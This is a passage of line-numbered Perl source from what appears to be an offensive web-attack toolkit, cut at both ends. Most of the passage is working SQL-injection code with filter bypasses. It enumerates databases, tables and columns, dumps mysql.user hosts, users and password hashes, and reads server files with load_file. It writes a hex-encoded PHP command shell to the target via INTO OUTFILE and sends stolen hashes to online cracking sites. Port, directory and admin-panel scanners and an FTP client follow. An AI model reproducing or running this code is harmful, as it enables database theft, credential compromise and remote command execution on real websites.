  796. if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
  797. print
  798. "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
  799. savefile(
  800. $save . ".txt",
  801. "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n"
  802. );
  803. }
  804. else {
  805. print "\n[-] Not found any data\n";
  806. }
  807. }
  808. }
  809.  
  810. sub menu_options {
  811.  
  812. my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
  813. my $save = $auth;
  814. print "\n/logs/webs/$save>";
  815. chomp( my $rta = <stdin> );
  816.  
  817. if ( $rta =~ /help/ ) {
  818. print qq(
  819.  
  820. commands : details tables columns dbs othertable othercolumn
  821. mysqluser dumper createshell readfile logs exit
  822.  
  823. );
  824. }
  825.  
  826. if ( $rta =~ /tables/ ) {
  827. schematables( $_[0], $_[1], $save );
  828. &reload;
  829. }
  830. elsif ( $rta =~ /columns (.*)/ ) {
  831. my $tabla = $1;
  832. schemacolumns( $_[0], $_[1], $save, $tabla );
  833. &reload;
  834. }
  835. elsif ( $rta =~ /dbs/ ) {
  836. &schemadb( $_[0], $_[1], $save );
  837. &reload;
  838. }
  839. elsif ( $rta =~ /othertable (.*)/ ) {
  840. my $data = $1;
  841. &schematablesdb( $_[0], $_[1], $data, $save );
  842. &reload;
  843. }
  844. elsif ( $rta =~ /othercolumn (.*) (.*)/ ) {
  845. my ( $db, $table ) = ( $1, $2 );
  846. &schemacolumnsdb( $_[0], $_[1], $db, $table, $save );
  847. &reload;
  848. }
  849. elsif ( $rta =~ /mysqluser/ ) {
  850. &mysqluser( $_[0], $_[1], $save );
  851. &reload;
  852. }
  853. elsif ( $rta =~ /logs/ ) {
  854. $t = "logs/webs/$save.txt";
  855. system("start $t");
  856. &reload;
  857. }
  858. elsif ( $rta =~ /exit/ ) {
  859. next;
  860. }
  861.  
  862. elsif ( $rta =~ /createshell/ ) {
  863. print "\n\n[Full Path Discloure] : ";
  864. chomp( my $path = <STDIN> );
  865. &into( $_[0], $_[1], $path, $save );
  866. }
  867. elsif ( $rta =~ /readfile/ ) {
  868. loadfile( $_[0], $_[1], $save );
  869. }
  870. elsif ( $rta =~ /dumper (.*) (.*) (.*)/ ) {
  871. my ( $tabla, $col1, $col2 ) = ( $1, $2, $3 );
  872. &dump( $_[0], $col1, $col2, $tabla, $_[1], $save );
  873. &reload;
  874. }
  875. elsif ( $rta =~ /details/ ) {
  876. &details( $_[0], $_[1], $save );
  877. &reload;
  878. }
  879. else {
  880. &reload;
  881. }
  882. }
  883.  
  884. sub schematables {
  885. $real = "1";
  886. my ( $page, $bypass, $save ) = @_;
  887. savefile( $save . ".txt", "\n" );
  888. print "\n";
  889. my $page1 = $page;
  890. ( $pass1, $pass2 ) = &bypass( $_[1] );
  891. savefile( $save . ".txt", "[DB] : default" );
  892. print "\n[+] Searching tables with schema\n\n";
  893. $page =~
  894. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  895. $page1 =~
  896. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  897. $code =
  898. toma( $page1
  899. . $pass1 . "from"
  900. . $pass1
  901. . "information_schema.tables"
  902. . $pass2 );
  903.  
  904. if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  905. my $resto = $1;
  906. $total = $resto - 17;
  907. print "[+] Tables Length : $total\n\n";
  908. savefile( $save . ".txt", "[+] Searching tables with schema\n" );
  909. savefile( $save . ".txt", "[+] Tables Length : $total\n" );
  910. my $limit = $1;
  911. for my $limit ( 17 .. $limit ) {
  912. $code1 =
  913. toma( $page
  914. . $pass1 . "from"
  915. . $pass1
  916. . "information_schema.tables"
  917. . $pass1 . "limit"
  918. . $pass1
  919. . $limit . ",1"
  920. . $pass2 );
  921. if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  922. my $table = $1;
  923. chomp $table;
  924. print "[Table $real Found : $table ]\n";
  925. savefile( $save . ".txt", "[Table $real Found : $table ]" );
  926. $real++;
  927. }
  928. }
  929. print "\n";
  930. }
  931. else {
  932. print "\n[-] information_schema = ERROR\n";
  933. }
  934. }
  935.  
  936. sub reload {
  937. &menu_options( $_[0] );
  938. }
  939.  
  940. sub schemacolumns {
  941. my ( $page, $bypass, $save, $table ) = @_;
  942. my $page3 = $page;
  943. my $page4 = $page;
  944. savefile( $save . ".txt", "\n" );
  945. print "\n";
  946. ( $pass1, $pass2 ) = &bypass($bypass);
  947. print "\n[DB] : default\n";
  948. savefile( $save . ".txt", "[DB] : default" );
  949. savefile( $save . ".txt", "[Table] : $table\n" );
  950. $page3 =~
  951. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  952. $code3 =
  953. toma( $page3
  954. . $pass1 . "from"
  955. . $pass1
  956. . "information_schema.columns"
  957. . $pass1 . "where"
  958. . $pass1
  959. . "table_name=char("
  960. . ascii($table) . ")"
  961. . $pass2 );
  962.  
  963. if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  964. print "\n[Columns Length : $1 ]\n\n";
  965. savefile( $save . ".txt", "[Columns Length : $1 ]\n" );
  966. my $si = $1;
  967. chomp $si;
  968. $page4 =~
  969. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  970. $real = "1";
  971. for my $limit2 ( 0 .. $si ) {
  972. $code4 =
  973. toma( $page4
  974. . $pass1 . "from"
  975. . $pass1
  976. . "information_schema.columns"
  977. . $pass1 . "where"
  978. . $pass1
  979. . "table_name=char("
  980. . ascii($table) . ")"
  981. . $pass1 . "limit"
  982. . $pass1
  983. . $limit2 . ",1"
  984. . $pass2 );
  985. if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  986. print "[Column $real] : $1\n";
  987. savefile( $save . ".txt", "[Column $real] : $1" );
  988. $real++;
  989. }
  990. }
  991. print "\n";
  992. }
  993. else {
  994. print "\n[-] information_schema = ERROR\n";
  995. }
  996. }
  997.  
  998. sub schemadb {
  999. my ( $page, $bypass, $save ) = @_;
  1000. my $page1 = $page;
  1001. savefile( $save . ".txt", "\n" );
  1002. print "\n\n[+] Searching DBS\n\n";
  1003. ( $pass1, $pass2 ) = &bypass($bypass);
  1004. $page =~
  1005. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  1006. $code =
  1007. toma( $page . $pass1 . "from" . $pass1 . "information_schema.schemata" );
  1008. if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  1009. my $limita = $1;
  1010. print "[+] Databases Length : $limita\n\n";
  1011. savefile( $save . ".txt", "[+] Databases Length : $limita\n" );
  1012. $page1 =~
  1013. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  1014. $real = "1";
  1015. for my $limit ( 0 .. $limita ) {
  1016. $code =
  1017. toma( $page1
  1018. . $pass1 . "from"
  1019. . $pass1
  1020. . "information_schema.schemata"
  1021. . $pass1 . "limit"
  1022. . $pass1
  1023. . $limit . ",1"
  1024. . $pass2 );
  1025. if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  1026. my $control = $1;
  1027. if ( $control ne "information_schema"
  1028. and $control ne "mysql"
  1029. and $control ne "phpmyadmin" )
  1030. {
  1031. print "[Database $real Found] $control\n";
  1032. savefile( $save . ".txt",
  1033. "[Database $real Found] : $control" );
  1034. $real++;
  1035. }
  1036. }
  1037. }
  1038. print "\n";
  1039. }
  1040. else {
  1041. print "[-] information_schema = ERROR\n";
  1042. }
  1043. }
  1044.  
  1045. sub schematablesdb {
  1046. my $page = $_[0];
  1047. my $db = $_[2];
  1048. my $page1 = $page;
  1049. savefile( $_[3] . ".txt", "\n" );
  1050. print "\n\n[+] Searching tables with DB $db\n\n";
  1051. ( $pass1, $pass2 ) = &bypass( $_[1] );
  1052. savefile( $_[3] . ".txt", "[DB] : $db" );
  1053. $page =~
  1054. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  1055. $page1 =~
  1056. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  1057. $code =
  1058. toma( $page1
  1059. . $pass1 . "from"
  1060. . $pass1
  1061. . "information_schema.tables"
  1062. . $pass1 . "where"
  1063. . $pass1
  1064. . "table_schema=char("
  1065. . ascii($db) . ")"
  1066. . $pass2 );
  1067.  
  1068. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
  1069. if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  1070. print "[+] Tables Length : $1\n\n";
  1071. savefile( $_[3] . ".txt", "[+] Tables Length : $1\n" );
  1072. my $limit = $1;
  1073. $real = "1";
  1074. for my $lim ( 0 .. $limit ) {
  1075. $code1 =
  1076. toma( $page
  1077. . $pass1 . "from"
  1078. . $pass1
  1079. . "information_schema.tables"
  1080. . $pass1 . "where"
  1081. . $pass1
  1082. . "table_schema=char("
  1083. . ascii($db) . ")"
  1084. . $pass1 . "limit"
  1085. . $pass1
  1086. . $lim . ",1"
  1087. . $pass2 );
  1088.  
  1089. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
  1090. if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  1091. my $table = $1;
  1092. chomp $table;
  1093. savefile( $_[3] . ".txt", "[Table $real Found : $table ]" );
  1094. print "[Table $real Found : $table ]\n";
  1095. $real++;
  1096. }
  1097. }
  1098. print "\n";
  1099. }
  1100. else {
  1101. print "\n[-] information_schema = ERROR\n";
  1102. }
  1103. }
  1104.  
  1105. sub schemacolumnsdb {
  1106. my ( $page, $bypass, $db, $table, $save ) = @_;
  1107. my $page3 = $page;
  1108. my $page4 = $page;
  1109. print "\n\n[+] Searching columns in table $table with DB $db\n\n";
  1110. savefile( $save . ".txt", "\n" );
  1111. ( $pass1, $pass2 ) = &bypass( $_[1] );
  1112. savefile( $save . ".txt", "\n[DB] : $db" );
  1113. savefile( $save . ".txt", "[Table] : $table" );
  1114. $page3 =~
  1115. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  1116. $code3 =
  1117. toma( $page3
  1118. . $pass1 . "from"
  1119. . $pass1
  1120. . "information_schema.columns"
  1121. . $pass1 . "where"
  1122. . $pass1
  1123. . "table_name=char("
  1124. . ascii($table) . ")"
  1125. . $pass1 . "and"
  1126. . $pass1
  1127. . "table_schema=char("
  1128. . ascii($db) . ")"
  1129. . $pass2 );
  1130.  
  1131. if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  1132. print "\n[Columns length : $1 ]\n\n";
  1133. savefile( $save . ".txt", "[Columns length : $1 ]\n" );
  1134. my $si = $1;
  1135. chomp $si;
  1136. $page4 =~
  1137. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  1138. $real = "1";
  1139. for my $limit2 ( 0 .. $si ) {
  1140. $code4 =
  1141. toma( $page4
  1142. . $pass1 . "from"
  1143. . $pass1
  1144. . "information_schema.columns"
  1145. . $pass1 . "where"
  1146. . $pass1
  1147. . "table_name=char("
  1148. . ascii($table) . ")"
  1149. . $pass1 . "and"
  1150. . $pass1
  1151. . "table_schema=char("
  1152. . ascii($db) . ")"
  1153. . $pass1 . "limit"
  1154. . $pass1
  1155. . $limit2 . ",1"
  1156. . $pass2 );
  1157. if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  1158. print "[Column $real] : $1\n";
  1159. savefile( $save . ".txt", "[Column $real] : $1" );
  1160. $real++;
  1161. }
  1162. }
  1163. }
  1164. else {
  1165. print "\n[-] information_schema = ERROR\n";
  1166. }
  1167. print "\n";
  1168. }
  1169.  
  1170. sub mysqluser {
  1171. my ( $page, $bypass, $save ) = @_;
  1172. my $cop = $page;
  1173. my $cop1 = $page;
  1174. savefile( $save . ".txt", "\n" );
  1175. print "\n\n[+] Finding mysql.users\n";
  1176. ( $pass1, $pass2 ) = &bypass($bypass);
  1177. $page =~ s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
  1178. $code = toma( $page . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 );
  1179.  
  1180. if ( $code =~ /RATSXPDOWN/ig ) {
  1181. $cop1 =~
  1182. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  1183. $code1 =
  1184. toma( $cop1 . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 );
  1185. if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  1186. print "\n[+] Users Found : $1\n\n";
  1187. savefile( $save . ".txt", "\n[+] Users mysql Found : $1\n" );
  1188. for my $limit ( 0 .. $1 ) {
  1189. $cop =~
  1190. s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
  1191. $code =
  1192. toma( $cop
  1193. . $pass1 . "from"
  1194. . $pass1
  1195. . "mysql.user"
  1196. . $pass1 . "limit"
  1197. . $pass1
  1198. . $limit . ",1"
  1199. . $pass2 );
  1200. if ( $code =~
  1201. /RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig )
  1202. {
  1203. print "[Host] : $1 [User] : $2 [Password] : $3\n";
  1204. savefile( $save . ".txt",
  1205. "[Host] : $1 [User] : $2 [Password] : $3" );
  1206. }
  1207. else {
  1208. print "\n";
  1209. &reload;
  1210. }
  1211. }
  1212. }
  1213. }
  1214. else {
  1215. print "\n[-] mysql.user = ERROR\n\n";
  1216. }
  1217. }
  1218.  
  1219. sub dump {
  1220. savefile( $_[5] . ".txt", "\n" );
  1221. my $page = $_[0];
  1222. ( $pass1, $pass2 ) = &bypass( $_[4] );
  1223. if ( $page =~ /(.*)hackman(.*)/ ) {
  1224. my $start = $1;
  1225. my $end = $2;
  1226. print "\n\n[+] Extracting values...\n\n";
  1227. $concatx =
  1228. "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
  1229. $val_code =
  1230. toma( $start
  1231. . $concatx
  1232. . $end
  1233. . $pass1 . "from"
  1234. . $pass1
  1235. . $_[3]
  1236. . $pass2 );
  1237. $concat =
  1238. "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
  1239. if ( $val_code =~ /ERTOR854(.*)ERTOR854/ig ) {
  1240. $tota = $1;
  1241. print "[+] Table : $_[3]\n";
  1242. print "[+] Length of the rows : $tota\n\n";
  1243. print "[$_[1]] [$_[2]]\n\n";
  1244. savefile( $_[5] . ".txt", "[Table] : $_[3]" );
  1245. savefile( $_[5] . ".txt", "[+] Length of the rows: $tota\n" );
  1246. savefile( $_[5] . ".txt", "[$_[1]] [$_[2]]\n" );
  1247. for my $limit ( 0 .. $tota ) {
  1248. chomp $limit;
  1249. $injection =
  1250. toma( $start
  1251. . $concat
  1252. . $end
  1253. . $pass1 . "from"
  1254. . $pass1
  1255. . $_[3]
  1256. . $pass1 . "limit"
  1257. . $pass1
  1258. . $limit . ",1"
  1259. . $pass2 );
  1260. if ( $injection =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854/ig ) {
  1261. savefile( $_[5] . ".txt", "[$_[1]] : $1 [$_[2]] : $2" );
  1262. print "[$_[1]] : $1 [$_[2]] : $2\n";
  1263. }
  1264. else {
  1265. print "\n\n[+] Extracting Finish\n\n";
  1266. last;
  1267. &reload;
  1268. }
  1269. }
  1270. }
  1271. else {
  1272. print "[-] Not Found any DATA\n\n";
  1273. }
  1274. }
  1275. }
  1276.  
  1277. sub loadfile {
  1278. savefile( $_[2] . ".txt", "\n" );
  1279. ( $pass1, $pass2 ) = &bypass( $_[1] );
  1280. if ( $_[0] =~ /(.*)hackman(.*)/g ) {
  1281. my $start = $1;
  1282. my $end = $2;
  1283. print "\n\n[+] File to read : ";
  1284. chomp( my $file = <stdin> );
  1285. $concat =
  1286. "unhex(hex(concat(char(107,48,98,114,97),load_file("
  1287. . encode($file)
  1288. . "),char(107,48,98,114,97))))";
  1289. my $code = toma( $start . $concat . $end . $pass2 );
  1290. chomp $code;
  1291. if ( $code =~ /k0bra(.*)k0bra/s ) {
  1292. print "[File Found] : $file\n";
  1293. print "\n[Source Start]\n\n";
  1294. print $1;
  1295. print "\n\n[Source End]\n\n";
  1296. savefile( $_[2] . ".txt", "[File Found] : $file" );
  1297. savefile( $_[2] . ".txt", "\n[Source Start]\n" );
  1298. savefile( $_[2] . ".txt", "$1" );
  1299. savefile( $_[2] . ".txt", "\n[Source End]\n" );
  1300. }
  1301. }
  1302. &reload;
  1303. }
  1304.  
  1305. sub into {
  1306. print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
  1307. my ( $page, $bypass, $dir, $save ) = @_;
  1308. savefile( $save . ".txt", "\n" );
  1309. print "\n";
  1310. ( $pass1, $pass2 ) = &bypass($bypass);
  1311. my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
  1312. if ( $path =~ /\/(.*)$/ ) {
  1313. my $path1 = $1;
  1314. my $path2 = $path1;
  1315. $path2 =~ s/$1//;
  1316. $dir =~ s/$path1//ig;
  1317. $shell = $dir . "/" . "shell.php";
  1318. if ( $page =~ /(.*)hackman(.*)/ig ) {
  1319. my ( $start, $end ) = ( $1, $2 );
  1320. $code =
  1321. toma( $start
  1322. . "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  1323. . $end
  1324. . $pass1 . "into"
  1325. . $pass1
  1326. . "outfile"
  1327. . $pass1 . "'"
  1328. . $shell . "'"
  1329. . $pass2 );
  1330. $code1 =
  1331. toma( "http://" . $auth . "/" . $path2 . "/" . "shell.php" );
  1332. if ( $code1 =~ /Mini Shell By Doddy/ig ) {
  1333. print "[shell up] : http://" . $auth . "/" . $path2 . "/"
  1334. . "shell.php\a";
  1335. savefile(
  1336. $save . ".txt",
  1337. "[shell up] : http://"
  1338. . $auth . "/"
  1339. . $path2 . "/"
  1340. . "shell.php"
  1341. );
  1342. }
  1343. else {
  1344. print "[shell] : Not Found\n";
  1345. }
  1346. }
  1347. }
  1348. print "\n\n";
  1349. &reload;
  1350. }
  1351.  
  1352. sub bypass {
  1353. if ( $_[0] eq "/*" ) { return ( "/**/", "/*" ); }
  1354. elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); }
  1355. else { return ( "+", "--" ); }
  1356. }
  1357.  
  1358. sub ascii {
  1359. return join ',', unpack "U*", $_[0];
  1360. }
  1361.  
  1362. sub base {
  1363. $re = encode_base64( $_[0] );
  1364. chomp $re;
  1365. return $re;
  1366. }
  1367.  
  1368. sub base_de {
  1369. $re = decode_base64( $_[0] );
  1370. chomp $re;
  1371. return $re;
  1372. }
  1373.  
  1374. sub download {
  1375. if ( $nave->mirror( $_[0], $_[1] ) ) {
  1376. if ( -f $_[1] ) {
  1377. return true;
  1378. }
  1379. }
  1380. }
  1381.  
  1382. sub hex_en {
  1383. my $string = $_[0];
  1384. $hex = '0x';
  1385. for ( split //, $string ) {
  1386. $hex .= sprintf "%x", ord;
  1387. }
  1388. return $hex;
  1389. }
  1390.  
  1391. sub hex_de {
  1392. my $text = shift;
  1393. $text =~ s/^0x//;
  1394. $encode = join q[], map { chr hex } $text =~ /../g;
  1395. return $encode;
  1396. }
  1397.  
  1398. sub ascii_de {
  1399. my $text = shift;
  1400. $text = join q[], map { chr } split q[,], $text;
  1401. return $text;
  1402. }
  1403.  
  1404. sub getprocess {
  1405.  
  1406. my %procesos;
  1407.  
  1408. my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
  1409. my $dos = $uno->ConnectServer( "", "root\\cimv2" );
  1410.  
  1411. foreach my $pro ( in $dos->InstancesOf("Win32_Process") ) {
  1412. $procesos{ $pro->{Caption} } = $pro->{ProcessId};
  1413. }
  1414. return %procesos;
  1415. }
  1416.  
  1417. sub killprocess {
  1418.  
  1419. my $pid = shift;
  1420.  
  1421. if ( Win32::Process::KillProcess( $pid, "" ) ) {
  1422. return true;
  1423. }
  1424. else {
  1425. return false;
  1426. }
  1427. }
  1428.  
  1429. sub getip {
  1430. my $get = gethostbyname( $_[0] );
  1431. return inet_ntoa($get);
  1432. }
  1433.  
  1434. sub crackit {
  1435.  
  1436. my $secret = $_[0];
  1437.  
  1438. print "[+] Cracking $_[0]\n\n";
  1439.  
  1440. my %hash = (
  1441.  
  1442. 'http://passcracking.com/' => {
  1443. 'tipo' => 'post',
  1444. 'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}',
  1445. 'regex' =>
  1446. '<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
  1447. },
  1448. 'http://md5.hashcracking.com/search.php?md5=' => {
  1449. 'tipo' => 'get',
  1450. 'regex' => 'Cleartext of $_[0] is (.*)',
  1451. },
  1452. 'http://www.bigtrapeze.com/md5/' => {
  1453. 'tipo' => 'post',
  1454. 'variables' => '{"query" => $_[0], "submit" => " Crack "}',
  1455. 'regex' =>
  1456. 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
  1457. },
  1458. 'http://opencrack.hashkiller.com/' => {
  1459. 'tipo' => 'post',
  1460. 'variables' =>
  1461. '{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
  1462. 'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
  1463. },
  1464. 'http://www.hashchecker.com/index.php?_sls=search_hash' => {
  1465. 'tipo' => 'post',
  1466. 'variables' => '{"search_field" => $_[0], "Submit" => "search"}',
  1467. 'regex' =>
  1468. '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
  1469. },
  1470. 'http://victorov.su/md5/?md5e=&md5d=' => {
  1471. 'tipo' => 'get',
  1472. 'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
  1473. }
  1474. );
  1475.  
  1476. for my $data ( keys %hash ) {
  1477.  
  1478. if ( $hash{$data}{tipo} eq "get" ) {
  1479. $code = toma( $data . $_[0] );
  1480. if ( $code =~ /$hash{$data}{regex}/ig ) {
  1481. print "\n[+] Decoded : " . $1 . "\n\n";
  1482. saveyes( "logs/pass-found.txt", $secret . ":" . $1 );
  1483. }
  1484. }
  1485. else {
  1486. $code = tomar( $data, $hash{$data}{variables} );
  1487. if ( $code =~ /$hash{$data}{regex}/ig ) {
  1488. saveyes( "logs/pass-found.txt", $secret . ":" . $1 );
  1489. }
  1490. }
  1491. }
  1492. print "\n[+] Finish\n";
  1493. }
  1494.  
  1495. sub ftp {
  1496.  
  1497. my ( $ftp, $user, $pass ) = @_;
  1498.  
  1499. if ( my $socket = Net::FTP->new($ftp) ) {
  1500. if ( $socket->login( $user, $pass ) ) {
  1501.  
  1502. print "\n[+] Enter of the server FTP\n\n";
  1503.  
  1504. menu:
  1505.  
  1506. print "\n\nftp>";
  1507. chomp( my $cmd = <stdin> );
  1508. print "\n\n";
  1509.  
  1510. if ( $cmd =~ /help/ ) {
  1511. print q(
  1512.  
  1513. help : show information
  1514. cd : change directory <dir>
  1515. dir : list a directory
  1516. mdkdir : create a directory <dir>
  1517. rmdir : delete a directory <dir>
  1518. pwd : directory
  1519. del : delete a file <file>
  1520. rename : change name of the a file <file1> <file2>
  1521. size : size of the a file <file>
  1522. put : upload a file <file>
  1523. get : download a file <file>
  1524. cdup : change dir <dir>
  1525. exit : ??
  1526.  
  1527.  
  1528. );
  1529. }
  1530.  
  1531. if ( $cmd =~ /dir/ig ) {
  1532. if ( my @files = $socket->dir() ) {
  1533. for (@files) {
  1534. print "[+] " . $_ . "\n";
  1535. }
  1536. }
  1537. else {
  1538. print "\n\n[-] Error\n\n";
  1539. }
  1540. }
  1541.  
  1542. if ( $cmd =~ /pwd/ig ) {
  1543. print "[+] Path : " . $socket->pwd() . "\n";
  1544. }
  1545.  
  1546. if ( $cmd =~ /cd (.*)/ig ) {
  1547. if ( $socket->cwd($1) ) {
  1548. print "[+] Directory changed\n";
  1549. }
  1550. else {
  1551. print "\n\n[-] Error\n\n";
  1552. }
  1553. }
  1554.  
  1555. if ( $cmd =~ /cdup/ig ) {
  1556. if ( my $dir = $socket->cdup() ) {
  1557. print "\n\n[+] Directory changed\n\n";
  1558. }
  1559. else {
  1560. print "\n\n[-] Error\n\n";
  1561. }
  1562. }
  1563.  
  1564. if ( $cmd =~ /del (.*)/ig ) {
  1565. if ( $socket->delete($1) ) {
  1566. print "[+] File deleted\n";
  1567. }
  1568. else {
  1569. print "\n\n[-] Error\n\n";
  1570. }
  1571. }
  1572.  
  1573. if ( $cmd =~ /rename (.*) (.*)/ig ) {
  1574. if ( $socket->rename( $1, $2 ) ) {
  1575. print "[+] File Updated\n";
  1576. }
  1577. else {
  1578. print "\n\n[-] Error\n\n";
  1579. }
  1580. }
  1581.  
  1582. if ( $cmd =~ /mkdir (.*)/ig ) {
  1583. if ( $socket->mkdir($1) ) {
  1584. print "\n\n[+] Directory created\n";
  1585. }
  1586. else {
  1587. print "\n\n[-] Error\n\n";
  1588. }
  1589. }
  1590.  
  1591. if ( $cmd =~ /rmdir (.*)/ig ) {
  1592. if ( $socket->rmdir($1) ) {
  1593. print "\n\n[+] Directory deleted\n";
  1594. }
  1595. else {
  1596. print "\n\n[-] Error\n\n";
  1597. }
  1598. }
  1599.  
  1600. if ( $cmd =~ /exit/ig ) {
  1601. next;
  1602. }
  1603.  
  1604. if ( $cmd =~ /get (.*) (.*)/ig ) {
  1605. print "\n\n[+] Downloading file\n\n";
  1606. if ( $socket->get( $1, $2 ) ) {
  1607. print "[+] Download completed";
  1608. }
  1609. else {
  1610. print "\n\n[-] Error\n\n";
  1611. }
  1612. }
  1613.  
  1614. if ( $cmd =~ /put (.*) (.*)/ig ) {
  1615. print "\n\n[+] Uploading file\n\n";
  1616. if ( $socket->put( $1, $2 ) ) {
  1617. print "[+] Upload completed";
  1618. }
  1619. else {
  1620. print "\n\n[-] Error\n\n";
  1621. }
  1622. }
  1623.  
  1624. if ( $cmd =~ /quit/ ) {
  1625. next;
  1626. }
  1627.  
  1628. goto menu;
  1629.  
  1630. }
  1631. else {
  1632. print "\n[-] Failed the login\n\n";
  1633. }
  1634.  
  1635. }
  1636. else {
  1637. print "\n\n[-] Error\n\n";
  1638. }
  1639.  
  1640. }
  1641.  
  1642. sub scanpaths {
  1643.  
  1644. my $urla = $_[0];
  1645.  
  1646. print "\n[+] Find paths in $urla\n\n\n";
  1647. my @urls = repes( get_links( toma($urla) ) );
  1648. for $url (@urls) {
  1649. my $web = $url;
  1650. my ( $scheme, $auth, $path, $query, $frag ) = uri_split($url);
  1651. if ( $_[0] =~ /$auth/ or $auth eq "" ) {
  1652. if ( $path =~ /(.*)\/(.*)\.(.*)$/ ) {
  1653. my $borrar = $2 . "." . $3;
  1654. if ( $web =~ /(.*)$borrar/ ) {
  1655. my $co = $1;
  1656. unless ( $co =~ /$auth/ ) {
  1657. $co = $urla . $co;
  1658. }
  1659. $code = toma($co);
  1660. if ( $code =~ /Index Of/ig ) {
  1661. print "[Link] : " . $co . "\n";
  1662. saveyes( "logs/paths-found.txt", $co );
  1663. }
  1664. }
  1665. }
  1666. }
  1667. }
  1668. }
  1669.  
  1670. sub scanport {
  1671.  
  1672. my %ports = (
  1673. "21" => "ftp",
  1674. "22" => "ssh",
  1675. "25" => "smtp",
  1676. "80" => "http",
  1677. "110" => "pop3",
  1678. "3306" => "mysql"
  1679. );
  1680.  
  1681. print "[+] Scanning $_[0]\n\n\n";
  1682.  
  1683. for my $port ( keys %ports ) {
  1684.  
  1685. if (
  1686. new IO::Socket::INET(
  1687. PeerAddr => $_[0],
  1688. PeerPort => $port,
  1689. Proto => "tcp",
  1690. Timeout => 0.5
  1691. )
  1692. )
  1693. {
  1694. print "[Port] : " . $port . " [Service] : " . $ports{$port} . "\n";
  1695. }
  1696. }
  1697. print "\n\n[+] Finish\n";
  1698. }
  1699.  
  1700. sub scanpanel {
  1701. print "[+] Scanning $_[0]\n\n\n";
  1702. for $path (@panels) {
  1703. $code = tomax( $_[0] . "/" . $path );
  1704. if ( $code->is_success ) {
  1705. print "[Link] : " . $_[0] . "/" . $path . "\n";
  1706. saveyes( "logs/panel-logs.txt", $_[0] . "/" . $path );
  1707. }
  1708. }
  1709. print "\n\n[+] Finish\n";
  1710. }
  1711.  
  1712. sub google {
  1713. my ( $a, $b ) = @_;
